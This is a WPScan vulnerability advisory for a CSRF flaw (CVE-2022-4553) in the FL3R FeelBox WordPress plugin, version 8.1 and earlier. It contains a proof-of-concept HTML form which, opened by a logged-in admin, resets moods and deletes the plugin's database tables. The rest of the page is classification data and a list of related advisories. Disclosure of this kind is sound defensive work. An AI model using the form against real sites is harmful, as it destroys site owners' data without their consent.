FL3R FeelBox <= 8.1 – Moods Reset via CSRF | CVE 2022-4553 | Plugin Vulnerabilities

Description

The plugin does not have CSRF check when updating reseting moods which could allow attackers to make logged in admins perform such action via a CSRF attack and delete the lydl_posts & lydl_poststimestamp DB tables

Proof of Concept

Make a logged in admin open a page containing the HTML code below

<form action="https://example.com/wp-admin/options-general.php?page=feelbox" method="POST">
    <input type="text" name="feelbox_submit_hidden" value="Y">
    <input type="text" name="cleardata" value="DELETE">
    <input type="submit" name="submit" value="submit">
</form>

Affects Plugins

No known fix

References

CVE

Classification

Type

CSRF

OWASP top 10

A2: Broken Authentication and Session Management

CWE

CVSS

Miscellaneous

Original Researcher

WPScan

Verified

Yes

WPVDB ID

483ed482-a1d1-44f6-8b99-56e653d3e45f

Timeline

Publicly Published

2023-01-04 (about 3 years ago)

Added

2023-01-04 (about 3 years ago)

Last Updated

2023-01-04 (about 3 years ago)

Other

Published

Title

Published

2025-12-31

Title

Recent Posts From Each Category <= 1.4 - Cross-Site Request Forgery

Published

2014-09-17

Title

Disqus < 2.79 - Cross-Site Request Forgery (CSRF)

Published

2025-03-24

Title

Replace Default Words <= 1.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting

Published

2025-03-11

Title

Maintenance Notice < 1.0.7 - Settings Reset via CSRF

Published

2023-12-26

Title

New User Approve < 2.5.2 - Cross-Site Request Forgery via admin_notices